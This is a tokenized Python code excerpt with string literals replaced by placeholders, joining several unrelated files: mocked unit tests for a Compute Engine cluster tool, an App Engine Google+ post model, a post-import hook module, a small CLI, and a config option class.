<NUM_LIT:0> ] , <EOL> '<STR_LIT>' ) <EOL> def testEnvironmentSetUp_Error ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( '<STR_LIT>' , return_value = <NUM_LIT:1> ) as mock_subprocess_call : <EOL> self . assertRaises ( <EOL> gce_cluster . EnvironmentSetUpError , <EOL> GceCluster ( <EOL> argparse . Namespace ( project = '<STR_LIT>' , bucket = '<STR_LIT>' ) <EOL> ) . EnvironmentSetUp ) <EOL> mock_subprocess_call . assert_called_once_with ( mock . ANY , shell = True ) <EOL> self . assertRegexpMatches ( <EOL> mock_subprocess_call . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' ) <EOL> def testStartCluster ( self ) : <EOL> """<STR_LIT>""" <EOL> parent_mock = self . _SetUpMocksForClusterStart ( ) <EOL> GceCluster ( argparse . Namespace ( <EOL> project = '<STR_LIT>' , bucket = '<STR_LIT>' , <EOL> machinetype = '<STR_LIT>' , image = '<STR_LIT>' , zone = '<STR_LIT>' , num_workers = <NUM_LIT:2> , <EOL> command = '<STR_LIT>' , external_ip = '<STR_LIT:all>' ) ) . StartCluster ( ) <EOL> method_calls = parent_mock . method_calls . __iter__ ( ) <EOL> call = method_calls . next ( ) <EOL> self . 
assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertRegexpMatches ( call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertRegexpMatches ( call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertRegexpMatches ( call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> self . 
assertFalse ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertRegexpMatches ( call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . 
assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> call = method_calls . next ( ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> self . assertRaises ( StopIteration , method_calls . next ) <EOL> def testStartCluster_NoExternalIp ( self ) : <EOL> """<STR_LIT>""" <EOL> parent_mock = self . 
_SetUpMocksForClusterStart ( ) <EOL> GceCluster ( argparse . Namespace ( <EOL> project = '<STR_LIT>' , bucket = '<STR_LIT>' , <EOL> machinetype = '<STR_LIT>' , image = '<STR_LIT>' , zone = '<STR_LIT>' , num_workers = <NUM_LIT:2> , <EOL> command = '<STR_LIT>' , external_ip = '<STR_LIT>' ) ) . StartCluster ( ) <EOL> call = parent_mock . method_calls [ <NUM_LIT:10> ] <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> call = parent_mock . method_calls [ <NUM_LIT> ] <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> self . assertFalse ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> call = parent_mock . method_calls [ <NUM_LIT> ] <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( '<STR_LIT>' , call [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> self . assertFalse ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( call [ <NUM_LIT:2> ] [ '<STR_LIT>' ] ) <EOL> def testStartCluster_InstanceStatusError ( self ) : <EOL> """<STR_LIT>""" <EOL> parent_mock = self . _SetUpMocksForClusterStart ( ) <EOL> parent_mock . GceApi . return_value . GetInstance . return_value = { <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> } <EOL> self . assertRaises ( <EOL> gce_cluster . ClusterSetUpError , <EOL> gce_cluster . GceCluster ( argparse . Namespace ( <EOL> project = '<STR_LIT>' , bucket = '<STR_LIT>' , <EOL> machinetype = '<STR_LIT>' , image = '<STR_LIT>' , zone = '<STR_LIT>' , num_workers = <NUM_LIT:2> , <EOL> command = '<STR_LIT>' , external_ip = '<STR_LIT:all>' ) ) . StartCluster ) <EOL> self . assertLessEqual ( <NUM_LIT> , parent_mock . GetInstance . 
call_count ) <EOL> self . assertLessEqual ( <NUM_LIT> , parent_mock . sleep . call_count ) <EOL> def testTeardownCluster ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( '<STR_LIT>' ) as mock_gce_api_class : <EOL> mock_gce_api_class . return_value . ListInstances . side_effect = [ <EOL> [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> ] , [ ] <EOL> ] <EOL> mock_gce_api_class . return_value . ListDisks . side_effect = [ <EOL> [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> ] , [ ] <EOL> ] <EOL> mock_gce_api_class . return_value . GetInstance . return_value = None <EOL> mock_gce_api_class . return_value . GetDisk . return_value = None <EOL> GceCluster ( argparse . Namespace ( <EOL> project = '<STR_LIT>' , zone = '<STR_LIT>' ) ) . TeardownCluster ( ) <EOL> mock_gce_api_class . assert_called_once_with ( <EOL> '<STR_LIT>' , mock . ANY , mock . ANY , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> ( mock_gce_api_class . return_value . ListInstances . <EOL> assert_called_with ( '<STR_LIT>' ) ) <EOL> ( mock_gce_api_class . return_value . ListDisks . <EOL> assert_called_with ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> [ mock . call ( '<STR_LIT>' ) , mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) ] , <EOL> mock_gce_api_class . return_value . DeleteInstance . call_args_list ) <EOL> self . assertEqual ( <EOL> [ mock . call ( '<STR_LIT>' ) , mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) ] , <EOL> mock_gce_api_class . return_value . DeleteDisk . call_args_list ) <EOL> def testTeardownCluster_WithPrefix ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( '<STR_LIT>' ) as mock_gce_api_class : <EOL> mock_gce_api_class . return_value . ListInstances . side_effect = [ <EOL> [ { '<STR_LIT:name>' : '<STR_LIT>' } ] , [ ] <EOL> ] <EOL> mock_gce_api_class . 
return_value . ListDisks . side_effect = [ <EOL> [ { '<STR_LIT:name>' : '<STR_LIT>' } ] , [ ] <EOL> ] <EOL> mock_gce_api_class . return_value . GetInstance . return_value = None <EOL> mock_gce_api_class . return_value . GetDisk . return_value = None <EOL> GceCluster ( argparse . Namespace ( <EOL> project = '<STR_LIT>' , zone = '<STR_LIT>' , <EOL> prefix = '<STR_LIT>' ) ) . TeardownCluster ( ) <EOL> mock_gce_api_class . assert_called_once_with ( <EOL> '<STR_LIT>' , mock . ANY , mock . ANY , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> ( mock_gce_api_class . return_value . ListInstances . <EOL> assert_called_with ( '<STR_LIT>' ) ) <EOL> ( mock_gce_api_class . return_value . ListDisks . <EOL> assert_called_with ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> [ mock . call ( '<STR_LIT>' ) ] , <EOL> mock_gce_api_class . return_value . DeleteInstance . call_args_list ) <EOL> self . assertEqual ( <EOL> [ mock . call ( '<STR_LIT>' ) ] , <EOL> mock_gce_api_class . return_value . DeleteDisk . call_args_list ) <EOL> def testTeardownCluster_NoInstance ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( '<STR_LIT>' ) as mock_gce_api_class : <EOL> mock_gce_api_class . return_value . ListInstances . return_value = [ ] <EOL> mock_gce_api_class . return_value . ListDisks . return_value = [ ] <EOL> GceCluster ( argparse . Namespace ( <EOL> project = '<STR_LIT>' , zone = '<STR_LIT>' ) ) . TeardownCluster ( ) <EOL> mock_gce_api_class . assert_called_once_with ( <EOL> '<STR_LIT>' , mock . ANY , mock . ANY , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> ( mock_gce_api_class . return_value . ListInstances . <EOL> assert_called_once_with ( '<STR_LIT>' ) ) <EOL> ( mock_gce_api_class . return_value . ListDisks . <EOL> assert_called_once_with ( '<STR_LIT>' ) ) <EOL> self . assertFalse ( <EOL> mock_gce_api_class . return_value . DeleteInstance . called ) <EOL> self . assertFalse ( <EOL> mock_gce_api_class . return_value . DeleteDisk . 
called ) <EOL> def testStartMapReduce ( self ) : <EOL> """<STR_LIT>""" <EOL> mock_subprocess_call = mock . patch ( '<STR_LIT>' , return_value = <NUM_LIT:0> ) . start ( ) <EOL> mock . patch ( '<STR_LIT>' , <EOL> side_effect = lambda x : '<STR_LIT>' + x ) . start ( ) <EOL> GceCluster ( argparse . Namespace ( <EOL> project = '<STR_LIT>' , bucket = '<STR_LIT>' , zone = '<STR_LIT>' , <EOL> input = '<STR_LIT>' , output = '<STR_LIT>' , <EOL> mapper = '<STR_LIT>' , reducer = '<STR_LIT>' , <EOL> mapper_count = <NUM_LIT:5> , reducer_count = <NUM_LIT:1> , <EOL> prefix = '<STR_LIT>' ) ) . StartMapReduce ( ) <EOL> self . assertEqual ( <NUM_LIT:4> , mock_subprocess_call . call_count ) <EOL> self . assertEqual ( <EOL> mock . call ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> shell = True ) , <EOL> mock_subprocess_call . call_args_list [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( <EOL> mock . call ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> shell = True ) , <EOL> mock_subprocess_call . call_args_list [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( <EOL> mock . call ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> shell = True ) , <EOL> mock_subprocess_call . call_args_list [ <NUM_LIT:2> ] ) <EOL> self . assertEqual ( <EOL> mock . call ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> shell = True ) , <EOL> mock_subprocess_call . call_args_list [ <NUM_LIT:3> ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import re <EOL> import logging <EOL> from google . appengine . ext import ndb <EOL> from endpoints_proto_datastore . ndb import EndpointsModel <EOL> from endpoints_proto_datastore . ndb import EndpointsAliasProperty <EOL> from endpoints_proto_datastore . ndb import EndpointsVariantIntegerProperty <EOL> from protorpc import messages <EOL> from models . activity_type import ActivityType <EOL> from models . product_group import ProductGroup <EOL> class ActivityPost ( EndpointsModel ) : <EOL> _message_fields_schema = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT:date>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:title>' , '<STR_LIT:url>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> _api_key = None <EOL> post_id = ndb . StringProperty ( ) <EOL> gplus_id = ndb . StringProperty ( ) <EOL> name = ndb . StringProperty ( ) <EOL> date = ndb . StringProperty ( ) <EOL> plus_oners = EndpointsVariantIntegerProperty ( <EOL> variant = messages . Variant . INT32 ) <EOL> resharers = EndpointsVariantIntegerProperty ( variant = messages . Variant . INT32 ) <EOL> comments = EndpointsVariantIntegerProperty ( variant = messages . Variant . INT32 ) <EOL> title = ndb . StringProperty ( ) <EOL> url = ndb . StringProperty ( ) <EOL> product_group = ndb . StringProperty ( repeated = True ) <EOL> activity_type = ndb . StringProperty ( repeated = True ) <EOL> links = ndb . StringProperty ( ) <EOL> deleted = ndb . BooleanProperty ( default = False ) <EOL> def ApiKeySet ( self , value ) : <EOL> self . _api_key = value <EOL> @ EndpointsAliasProperty ( setter = ApiKeySet , property_type = messages . StringField ) <EOL> def api_key ( self ) : <EOL> return self . _api_key <EOL> def IdSet ( self , value ) : <EOL> if not isinstance ( value , basestring ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> self . UpdateFromKey ( ndb . 
Key ( ActivityPost , value ) ) <EOL> @ EndpointsAliasProperty ( setter = IdSet , required = True ) <EOL> def id ( self ) : <EOL> if self . key is not None : <EOL> return self . key . string_id ( ) <EOL> def create_from_gplus_post ( self , gplus_post ) : <EOL> self . post_id = gplus_post [ "<STR_LIT:id>" ] <EOL> self . name = gplus_post [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . gplus_id = gplus_post [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> self . date = gplus_post [ "<STR_LIT>" ] <EOL> self . url = gplus_post [ "<STR_LIT:url>" ] <EOL> self . title = gplus_post [ "<STR_LIT:title>" ] <EOL> self . plus_oners = gplus_post [ '<STR_LIT:object>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . resharers = gplus_post [ '<STR_LIT:object>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . comments = gplus_post [ '<STR_LIT:object>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> content = gplus_post [ "<STR_LIT:object>" ] [ "<STR_LIT:content>" ] <EOL> if '<STR_LIT>' in gplus_post : <EOL> content += '<STR_LIT:U+0020>' + gplus_post [ '<STR_LIT>' ] <EOL> self . activity_type = self . get_activity_types ( content ) <EOL> self . product_group = self . get_product_groups ( content ) <EOL> try : <EOL> attachments = gplus_post [ "<STR_LIT:object>" ] [ "<STR_LIT>" ] <EOL> except Exception as e : <EOL> logging . info ( '<STR_LIT>' ) <EOL> self . links = "<STR_LIT>" <EOL> else : <EOL> attachment_links = self . get_links ( attachments ) <EOL> self . links = attachment_links <EOL> def get_activity_types ( self , content ) : <EOL> """<STR_LIT>""" <EOL> at = [ ] <EOL> for activity_type in ActivityType . all_tags ( ) : <EOL> result = re . search ( activity_type , content , flags = re . IGNORECASE ) <EOL> if result is not None : <EOL> at . append ( activity_type ) <EOL> return at <EOL> def get_product_groups ( self , content ) : <EOL> """<STR_LIT>""" <EOL> pg = [ ] <EOL> for product_group in ProductGroup . all_tags ( ) : <EOL> result = re . search ( product_group , content , flags = re . 
IGNORECASE ) <EOL> if result is not None : <EOL> pg . append ( product_group ) <EOL> return pg <EOL> def get_links ( self , attachments ) : <EOL> """<STR_LIT>""" <EOL> links = "<STR_LIT>" <EOL> for attachment in attachments : <EOL> if attachment [ "<STR_LIT>" ] == "<STR_LIT>" or attachment [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> if links != "<STR_LIT>" : <EOL> links += "<STR_LIT:U+002CU+0020>" <EOL> links += attachment [ "<STR_LIT:url>" ] <EOL> return links </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import threading <EOL> PY2 = sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> <EOL> PY3 = sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:3> <EOL> if PY3 : <EOL> import importlib <EOL> string_types = str , <EOL> else : <EOL> string_types = basestring , <EOL> from . decorators import synchronized <EOL> _post_import_hooks = { } <EOL> _post_import_hooks_init = False <EOL> _post_import_hooks_lock = threading . RLock ( ) <EOL> def _create_import_hook_from_string ( name ) : <EOL> def import_hook ( module ) : <EOL> module_name , function = name . split ( '<STR_LIT::>' ) <EOL> attrs = function . split ( '<STR_LIT:.>' ) <EOL> __import__ ( module_name ) <EOL> callback = sys . modules [ module_name ] <EOL> for attr in attrs : <EOL> callback = getattr ( callback , attr ) <EOL> return callback ( module ) <EOL> return import_hook <EOL> @ synchronized ( _post_import_hooks_lock ) <EOL> def register_post_import_hook ( hook , name ) : <EOL> if isinstance ( hook , string_types ) : <EOL> hook = _create_import_hook_from_string ( hook ) <EOL> global _post_import_hooks_init <EOL> if not _post_import_hooks_init : <EOL> _post_import_hooks_init = True <EOL> sys . meta_path . insert ( <NUM_LIT:0> , ImportHookFinder ( ) ) <EOL> hooks = _post_import_hooks . get ( name , None ) <EOL> if hooks is None : <EOL> module = sys . modules . get ( name , None ) <EOL> if module is not None : <EOL> _post_import_hooks [ name ] = [ ] <EOL> hook ( module ) <EOL> else : <EOL> _post_import_hooks [ name ] = [ hook ] <EOL> elif hooks == [ ] : <EOL> module = sys . modules [ name ] <EOL> hook ( module ) <EOL> else : <EOL> _post_import_hooks [ name ] . append ( hook ) <EOL> def _create_import_hook_from_entrypoint ( entrypoint ) : <EOL> def import_hook ( module ) : <EOL> __import__ ( entrypoint . module_name ) <EOL> callback = sys . modules [ entrypoint . module_name ] <EOL> for attr in entrypoint . 
attrs : <EOL> callback = getattr ( callback , attr ) <EOL> return callback ( module ) <EOL> return import_hook <EOL> def discover_post_import_hooks ( group ) : <EOL> try : <EOL> import pkg_resources <EOL> except ImportError : <EOL> return <EOL> for entrypoint in pkg_resources . iter_entry_points ( group = group ) : <EOL> callback = _create_import_hook_from_entrypoint ( entrypoint ) <EOL> register_post_import_hook ( callback , entrypoint . name ) <EOL> @ synchronized ( _post_import_hooks_lock ) <EOL> def notify_module_loaded ( module ) : <EOL> name = getattr ( module , '<STR_LIT>' , None ) <EOL> hooks = _post_import_hooks . get ( name , None ) <EOL> if hooks : <EOL> _post_import_hooks [ name ] = [ ] <EOL> for hook in hooks : <EOL> hook ( module ) <EOL> class _ImportHookLoader : <EOL> def load_module ( self , fullname ) : <EOL> module = sys . modules [ fullname ] <EOL> notify_module_loaded ( module ) <EOL> return module <EOL> class _ImportHookChainedLoader : <EOL> def __init__ ( self , loader ) : <EOL> self . loader = loader <EOL> def load_module ( self , fullname ) : <EOL> module = self . loader . load_module ( fullname ) <EOL> notify_module_loaded ( module ) <EOL> return module <EOL> class ImportHookFinder : <EOL> def __init__ ( self ) : <EOL> self . in_progress = { } <EOL> @ synchronized ( _post_import_hooks_lock ) <EOL> def find_module ( self , fullname , path = None ) : <EOL> if not fullname in _post_import_hooks : <EOL> return None <EOL> if fullname in self . in_progress : <EOL> return None <EOL> self . in_progress [ fullname ] = True <EOL> try : <EOL> if PY3 : <EOL> loader = importlib . find_loader ( fullname , path ) <EOL> if loader : <EOL> return _ImportHookChainedLoader ( loader ) <EOL> else : <EOL> __import__ ( fullname ) <EOL> return _ImportHookLoader ( ) <EOL> finally : <EOL> del self . 
in_progress [ fullname ] <EOL> def when_imported ( name ) : <EOL> def register ( hook ) : <EOL> register_post_import_hook ( hook , name ) <EOL> return hook <EOL> return register </s>
<s> import argparse <EOL> from pyg . Pygemony import Pygemony <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( '<STR_LIT>' , required = True ) <EOL> parser . add_argument ( '<STR_LIT>' , required = True ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> args = vars ( args ) <EOL> pygemony = Pygemony ( args . get ( '<STR_LIT:username>' ) , <EOL> args . get ( '<STR_LIT>' ) , <EOL> args . get ( '<STR_LIT>' ) , <EOL> args . get ( '<STR_LIT>' ) ) <EOL> pygemony . run ( ) </s>
<s> from __future__ import absolute_import , print_function , unicode_literals , division <EOL> from sc2reader . factories . sc2factory import SC2Factory <EOL> from sc2reader . factories . sc2factory import FileCachedSC2Factory <EOL> from sc2reader . factories . sc2factory import DictCachedSC2Factory <EOL> from sc2reader . factories . sc2factory import DoubleCachedSC2Factory </s>
<s> import json <EOL> from nativeconfig . exceptions import DeserializationError , ValidationError , InitializationError <EOL> from nativeconfig . options . base_option import BaseOption <EOL> class ArrayOption ( BaseOption ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , value_option = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( ) . __init__ ( name , setter = '<STR_LIT>' , getter = '<STR_LIT>' , ** kwargs ) <EOL> if value_option : <EOL> from nativeconfig . options . dict_option import DictOption <EOL> if isinstance ( value_option , BaseOption ) and not isinstance ( value_option , ArrayOption ) and not isinstance ( value_option , DictOption ) : <EOL> self . _value_option = value_option <EOL> else : <EOL> raise InitializationError ( "<STR_LIT>" ) <EOL> else : <EOL> self . _value_option = None <EOL> def serialize ( self , value ) : <EOL> if self . _value_option : <EOL> serializable_list = [ ] <EOL> for i in value : <EOL> serializable_list . append ( self . _value_option . serialize ( i ) ) <EOL> return serializable_list <EOL> else : <EOL> return value <EOL> def deserialize ( self , raw_value ) : <EOL> try : <EOL> if self . _value_option : <EOL> deserialized_list = [ ] <EOL> for i in raw_value : <EOL> deserialized_list . append ( self . _value_option . deserialize ( i ) ) <EOL> value = deserialized_list <EOL> else : <EOL> value = raw_value <EOL> except DeserializationError : <EOL> raise DeserializationError ( "<STR_LIT>" . format ( raw_value , self . name ) , raw_value , self . name ) <EOL> else : <EOL> return value <EOL> def serialize_json ( self , value ) : <EOL> if value is None : <EOL> return json . dumps ( None ) <EOL> elif self . _value_option : <EOL> return '<STR_LIT:[>' + '<STR_LIT:U+002CU+0020>' . join ( [ self . _value_option . serialize_json ( v ) for v in value ] ) + '<STR_LIT:]>' <EOL> else : <EOL> return json . dumps ( value ) <EOL> def deserialize_json ( self , json_value ) : <EOL> try : <EOL> value = json . 
loads ( json_value ) <EOL> except ValueError : <EOL> raise DeserializationError ( "<STR_LIT>" . format ( self . name , json_value ) , json_value , self . name ) <EOL> else : <EOL> if value is not None : <EOL> if not isinstance ( value , list ) : <EOL> raise DeserializationError ( "<STR_LIT>" . format ( json_value ) , json_value , self . name ) <EOL> else : <EOL> if self . _value_option : <EOL> return [ self . _value_option . deserialize_json ( json . dumps ( v ) ) for v in value ] <EOL> else : <EOL> return value <EOL> else : <EOL> return None <EOL> def validate ( self , value ) : <EOL> super ( ) . validate ( value ) <EOL> if not isinstance ( value , ( list , tuple ) ) : <EOL> raise ValidationError ( "<STR_LIT>" . format ( value , self . name ) , value , self . name ) </s>
